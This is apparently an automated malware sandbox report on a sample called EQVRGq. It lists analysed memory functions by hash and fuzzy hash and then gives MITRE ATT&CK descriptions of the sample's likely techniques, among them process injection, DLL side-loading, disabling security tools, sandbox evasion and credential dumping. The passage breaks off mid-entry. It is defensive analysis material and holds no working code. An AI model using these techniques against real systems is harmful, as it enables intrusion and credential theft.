Instruction ID: 7513e25cb7a3f71bb8c7ab1bfa0216587fee63ab55837a78748950f659ac7e27
Opcode Fuzzy Hash: 1cc4c8ec98a1b501f328c9a086cad272edd239a8e375ebdbcd9538954eb8677a
Instruction Fuzzy Hash: F331C430E5121B9FCF55EF68C884A9EBBB2FF85304F148929E405EB751DB71E8868B40

Function 06A22090 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84726d292fd032aeb9c7668a75cf5ce4fc44b09b6deaf1e5fdd4dc32408884b7
Instruction ID: 332529f9b29ed871e16976816b9dbcb4ac08ba1bd3ef9af0bdd5afe17ae8be42
Opcode Fuzzy Hash: 84726d292fd032aeb9c7668a75cf5ce4fc44b09b6deaf1e5fdd4dc32408884b7
Instruction Fuzzy Hash: 4B31A330E0021AABCB54DF68D854A9EB7B2FF89304F108529E906EB750DB71ED82CB50

Function 06A23AB0 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5420e10a2e18ad44f7201e1732fa3d25b40357358e619bca6677c3473146c665
Instruction ID: 61106f919c00bebb72a9f014cd04e6d029a950a20432bae8ada35b158b0ecb5c
Opcode Fuzzy Hash: 5420e10a2e18ad44f7201e1732fa3d25b40357358e619bca6677c3473146c665
Instruction Fuzzy Hash: C8218075F402159FDB00DF79E890AAE7BF5EB89610F008025E909E7390EB39DC018B91

Function 06A23AC0 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d0a67b845e86daa04064f4456a77e8612d8df30f9b09b3dbbc9e331f7c22857
Instruction ID: 47ac759d601d326a0d2f4d054057988ffe4a5093f53ad65de0653aba84e590ff
Opcode Fuzzy Hash: 4d0a67b845e86daa04064f4456a77e8612d8df30f9b09b3dbbc9e331f7c22857
Instruction Fuzzy Hash: F9216B75E402169FEF40DF69D890AAEB7F1EB89610F10803AE909E7350E739DD018B95

Function 013BD044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4157849603.00000000013BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_13bd000_EQVRGq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f8be6ff08b1dc425a4ea2fc636ef6d83b0752fc0582d5ecb5742677d866a11c
Instruction ID: 669a9daaccf89e7ce7dc3617801f51ee8bb1be6b3782371c118f81cf672f3fde
Opcode Fuzzy Hash: 1f8be6ff08b1dc425a4ea2fc636ef6d83b0752fc0582d5ecb5742677d866a11c
Instruction Fuzzy Hash: 82214271600208DFCB01CF68C9C0B26BBA5FB8431CF20C56DEA094BA52D73AD446CA61

Function 06A26D29 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d10f1ca0f8ef5413cedbb605cb65e78a7891f59465d8a779f0eeec684d206439
Instruction ID: 437aeaaa7d07d632ddd418ada93e429420bc1ad5f54f8daddf8bd6c6a15e8c0e
Opcode Fuzzy Hash: d10f1ca0f8ef5413cedbb605cb65e78a7891f59465d8a779f0eeec684d206439
Instruction Fuzzy Hash: DC21CD30B0102A9BDF44EB69E8406AEB7B6EBC4354F248425D80AEB390DA35DD818B81

Function 06A26D38 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83438bd7987d5f425d3e730aa364bc79d29e12832875b14ee676786f6f33862d
Instruction ID: 43926d5d44d875d5893166306e397f4e7c3e7937c31c190093d716e9425d8113
Opcode Fuzzy Hash: 83438bd7987d5f425d3e730aa364bc79d29e12832875b14ee676786f6f33862d
Instruction Fuzzy Hash: A021AE30B1102A9BDF44EB6CE84069EB7B6EB84354F248425D409EB350DB35ED818B84

Function 06A23BD0 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd774c48ef528baf6ad5a05f1789393458cfd1c72ca454876103cb0cb060a0ad
Instruction ID: 8cc0645b05efb32a105aece67611678108dea87f6af628a91fa8937f91d1f3de
Opcode Fuzzy Hash: dd774c48ef528baf6ad5a05f1789393458cfd1c72ca454876103cb0cb060a0ad
Instruction Fuzzy Hash: 5011A532B041359FDF55AA6CC8146AF73BAEBC9710F004439D50AE7340EE69DC068BE1

Function 06A2FEF8 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 551997b9ad3ff0188622d2e839267cb7d95f1e098f0ff18d9a7577de18b119d6
Instruction ID: b104deb02699e95f700803f4303cc903e1cb0011c96faf6b07d675ae779cc73c
Opcode Fuzzy Hash: 551997b9ad3ff0188622d2e839267cb7d95f1e098f0ff18d9a7577de18b119d6
Instruction Fuzzy Hash: EB1112B6D002198FDB20DF9AC944ADEFBF4EF49320F10842EE899A7210C375A545CFA4

Function 06A23E07 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb81fc82760ebf6958aa1f6d0fa64fab648a480529d51cbf9007e322867e9d4b
Instruction ID: e1e4703ce0ffec33bed372854d322b3c10c7f5b1205ddaa42f8e334e2877f319
Opcode Fuzzy Hash: fb81fc82760ebf6958aa1f6d0fa64fab648a480529d51cbf9007e322867e9d4b
Instruction Fuzzy Hash: A901B135B040222BCB64E62DA45472BF7DBDBCB614F14883AE50ACB741DD29DC4647A5

Function 06A2EDB1 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78d79b2582d9785f3f4932706cf71c1f8959c8404cba2dff739df3f19ab20b5f
Instruction ID: 49973755b3b41227a44dbb7d3d3a5430014fa56368b761af7643a38e367111ed
Opcode Fuzzy Hash: 78d79b2582d9785f3f4932706cf71c1f8959c8404cba2dff739df3f19ab20b5f
Instruction Fuzzy Hash: 3501D431B400215BCB61EA2CA894B2F77DAEBCA714F148839E50ACB340DA15DC424795

Function 013BD03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4157849603.00000000013BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_13bd000_EQVRGq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: f70192a43e7aeb8d019e32c7f67fa80da506d7b972969db918dbc8e86b1e6351
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: 2411DD75504284CFDB12CF54C9C4B56BFA2FB84318F24C6AAD9494B656C33AD44ACF62

Function 06A23888 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1fcccdd028ba1a1bce0ab663a053627391c7ee7bc323742a98af333391ba306
Instruction ID: 0276843756a64bc19d78b05e4d4da7d1d84b1e526e53bb0ac3ba4ab30a75c6cc
Opcode Fuzzy Hash: c1fcccdd028ba1a1bce0ab663a053627391c7ee7bc323742a98af333391ba306
Instruction Fuzzy Hash: 5C21C0B5D01259ABCB10DF9AD884ACEFFB4FB49310F10812AE918B7250C774A954CFA5

Function 06A23BC0 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ee45c732c23ceb4741add7e422a7d1774572e3d7d6bb82008fcd18ba451a84e
Instruction ID: 99e222e671063d9015783054216a8690c41cdd2331668c17b7fd2a050c3d7725
Opcode Fuzzy Hash: 7ee45c732c23ceb4741add7e422a7d1774572e3d7d6bb82008fcd18ba451a84e
Instruction Fuzzy Hash: 21018436B140256BDF54AA6DDC106AF77AFDBC9710F00443AE509E7240EE69DC0687E2

Function 06A2FF00 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7bfd21af744248a0dbc61c2e7dbc2653cedbf16279f67198a93b055f538ba23
Instruction ID: cef64476cac64fc19aead9a339e32dec515d3524cbc81c529042c986504d6e46
Opcode Fuzzy Hash: d7bfd21af744248a0dbc61c2e7dbc2653cedbf16279f67198a93b055f538ba23
Instruction Fuzzy Hash: 8B11F0B6D002598FDB20DF9AC844ADEFBF4EF89320F10842EE959A7210C375A545CFA5

Function 06A23890 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7611e0c7e7a747b692c6023c48b5f4bc635eeda1a21c19b206601aa6b62f5d2b
Instruction ID: cf8d96d0be74886460c5164ffd935197ed70fb2d088424299928a7a796efd752
Opcode Fuzzy Hash: 7611e0c7e7a747b692c6023c48b5f4bc635eeda1a21c19b206601aa6b62f5d2b
Instruction Fuzzy Hash: 9C11AFB5D01259AFCB10DF9AD884ADEFFB4FB49324F10812AE918A7250C374A954CFA5

Function 06A23E18 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fbec80bfc32bfe4eae85c803e77bc7b6192dd68297f1bc90897212601d33b5f
Instruction ID: 5d9ad1ad5550334ba64e0897a7e5b4de1841c63a7a43208c7ba42a454a247c11
Opcode Fuzzy Hash: 8fbec80bfc32bfe4eae85c803e77bc7b6192dd68297f1bc90897212601d33b5f
Instruction Fuzzy Hash: 4C016D31B000222BDF64A66DA45472FE3DADBCBA14F20883AE50ACB384D969DC4647A5

Function 06A2EDC0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c72562341325553635bb040287d5a9f54450b8f2b04fc24312a31248d9a67cb
Instruction ID: 6008eb287c5f72b83b6e60427088f233e6f1e887f27da4bf59864723484dfb97
Opcode Fuzzy Hash: 6c72562341325553635bb040287d5a9f54450b8f2b04fc24312a31248d9a67cb
Instruction Fuzzy Hash: 33018C31B400226BCB65A62DA85472EA3DAEBCA718F148839E10FCB340EE25DC834795

Function 06A2A328 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5530830f3c9403c1cce296ae4772585d2c10938f51ee57e727b24e4f3e885473
Instruction ID: cec6eaac3a5377a11f8f769035a1b6f2289e3e19e4417a8dea7efd4883d7a4b7
Opcode Fuzzy Hash: 5530830f3c9403c1cce296ae4772585d2c10938f51ee57e727b24e4f3e885473
Instruction Fuzzy Hash: EF018F35B440228FDB65EB3CE45471EB7E6EB8A714F14887EE20ECB741DA29DC018B85

Function 06A2A338 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad3d55d6fc9c67387ceac249b3518c3807f53bf6168cb69b0e553b2778a04c9b
Instruction ID: 1a7fc4fd6b2ca5d6b022dfad10df5b0594de1699de144f965dbc20e084795310
Opcode Fuzzy Hash: ad3d55d6fc9c67387ceac249b3518c3807f53bf6168cb69b0e553b2778a04c9b
Instruction Fuzzy Hash: 12016D35B000215FDB64EB2DE45471EB3D6E78A714F108839E60ECB340DA25DC014BC5

Function 06A2C7F0 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8d723b2b826c64c4e42e7f148174af540be89d5e710e55216e6ee79ba30f874
Instruction ID: a27de8206bbdf4881da62b1262369b6ec95f5b9045a9a0583dc3f45796621edc
Opcode Fuzzy Hash: b8d723b2b826c64c4e42e7f148174af540be89d5e710e55216e6ee79ba30f874
Instruction Fuzzy Hash: 40F0EC32F202749BDB54AA79EC00A9EB73AE784364F004435ED02FB740DA756C00C7D0

Function 06A26490 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03f7a7a52af8f187be450c4d356df6ff666a4cb81608804c98cf0e4a0c113bc7
Instruction ID: d358c5d983461c53a8f97c8a48cae00d3e5f03d6996ac33247dfb8d5e3ae6eb7
Opcode Fuzzy Hash: 03f7a7a52af8f187be450c4d356df6ff666a4cb81608804c98cf0e4a0c113bc7
Instruction Fuzzy Hash: 6CE0D871E212196BDB50EFB8CA5574B77AFD741204F108DA5E408CF201E136CE0247D1

Non-executed Functions

Function 06A276C0 Relevance: 13.0, Strings: 10, Instructions: 468COMMON

Download Yara Rule

Strings

$^q, xrefs: 06A277D7
$^q, xrefs: 06A27C3D
$^q, xrefs: 06A27808
$^q, xrefs: 06A27B94
$^q, xrefs: 06A27C27
$^q, xrefs: 06A277CB
$^q, xrefs: 06A27C33
$^q, xrefs: 06A27B88
$^q, xrefs: 06A277FC
$^q, xrefs: 06A27C49

Memory Dump Source

Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2222239885
Opcode ID: 3133dfa049ab1ec686e68fbb0f0d901401cd8ef04cd8dd659b39a039768bb9d2
Instruction ID: 85b9897b57c8bacd0ca31418e7f0f6fb1fabb1399790295ceacfaf910d8aa596
Opcode Fuzzy Hash: 3133dfa049ab1ec686e68fbb0f0d901401cd8ef04cd8dd659b39a039768bb9d2
Instruction Fuzzy Hash: 28122B30E4022A8FDB68EF69C954A5EB7B2BF84704F208569D409AB354DB34DE85CF91

Function 06A2A958 Relevance: 10.2, Strings: 8, Instructions: 229COMMON

Download Yara Rule

Strings

$^q, xrefs: 06A2AB0A
$^q, xrefs: 06A2AAB5
$^q, xrefs: 06A2AAD4
$^q, xrefs: 06A2AAA9
$^q, xrefs: 06A2AAE0
$^q, xrefs: 06A2AA5A
$^q, xrefs: 06A2AB16
$^q, xrefs: 06A2AA4E

Memory Dump Source

Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3823777903
Opcode ID: a037c5cb84c3b27ed6c16f94226949e0c538334cdaf406dbee810c9ba4f0d5af
Instruction ID: 5477be27dc62659e1f4ed5b20ffb64646bdf5d696527a318a59a4f721d70bf58
Opcode Fuzzy Hash: a037c5cb84c3b27ed6c16f94226949e0c538334cdaf406dbee810c9ba4f0d5af
Instruction Fuzzy Hash: CA918030E8021ADFEB68EF68D654B6EB7B2FF84700F108529D506AB354DB389C45CB90

Function 06A270C0 Relevance: 9.2, Strings: 7, Instructions: 405COMMON

Download Yara Rule

Strings

.5vq, xrefs: 06A2711B
$^q, xrefs: 06A273FC
$^q, xrefs: 06A275C8
$^q, xrefs: 06A273A2
$^q, xrefs: 06A27408
$^q, xrefs: 06A2755C
$^q, xrefs: 06A275D4

Memory Dump Source

Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd

Similarity

API ID:
String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-390881366
Opcode ID: cdbfcb219fdd3b8b6cf65ac896e887b5a8417ed3c5cc598106350e85eae411a2
Instruction ID: 3d7d097b8cd382b045f907de83bd1172a8cad2f40807c47e8f7804df94589585
Opcode Fuzzy Hash: cdbfcb219fdd3b8b6cf65ac896e887b5a8417ed3c5cc598106350e85eae411a2
Instruction Fuzzy Hash: 8EF13F30A40219CFDB58EFA8D594A6EB7B3FF84300F248569D406AB364DB39DD46CB90

Function 06A283F8 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$^q, xrefs: 06A2865E
$^q, xrefs: 06A286C3
$^q, xrefs: 06A286B7
$^q, xrefs: 06A28652

Memory Dump Source

Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 3f64e844e93dfc5e7e57c9c479d8289ea3833149899ae2effa039e48004d0358
Instruction ID: da4420897493c714954484bb0e32cbe33d55e4e78888bba152608315df69f24a
Opcode Fuzzy Hash: 3f64e844e93dfc5e7e57c9c479d8289ea3833149899ae2effa039e48004d0358
Instruction Fuzzy Hash: A1B12D30A40219CFDB58EF69D58466EB7B2FF84304F248529E4069B395DB79DC86CB90

Function 06A28810 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

LR^q, xrefs: 06A28952
LR^q, xrefs: 06A28903
$^q, xrefs: 06A2888F
$^q, xrefs: 06A2889B

Memory Dump Source

Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd

Similarity

API ID:
String ID: LR^q$LR^q$$^q$$^q
API String ID: 0-2454687669
Opcode ID: 7a952b745357c57ae346a10b1e261be41c9b751a2c4837ca95266a175b9a1fa9
Instruction ID: 11f2d89ae08d361791f142bed246e3568f66f9939262573c287f71ec5d0062fa
Opcode Fuzzy Hash: 7a952b745357c57ae346a10b1e261be41c9b751a2c4837ca95266a175b9a1fa9
Instruction Fuzzy Hash: B0519130B402168FDB58EF6CD944A6AB7E2FF84304F148569E506AF395DB38EC45CB91

Function 06A2ACEA Relevance: 5.2, Strings: 4, Instructions: 156COMMON

Download Yara Rule

Strings

$^q, xrefs: 06A2AE64
$^q, xrefs: 06A2AE93
$^q, xrefs: 06A2AE11
$^q, xrefs: 06A2AEBC

Memory Dump Source

Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: cd96eb1d87ab052f4236001a9d299a31b2cf296fe5f75298426693d764ecd826
Instruction ID: b495dbd1c3ea289de565752192b07b2a05e847b4035753808ccf4f8ff9a14355
Opcode Fuzzy Hash: cd96eb1d87ab052f4236001a9d299a31b2cf296fe5f75298426693d764ecd826
Instruction Fuzzy Hash: FC517E30E502268FDF65EF68E58066EB3F2EB85310F148529DA06EB354DB34DC42CB91

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
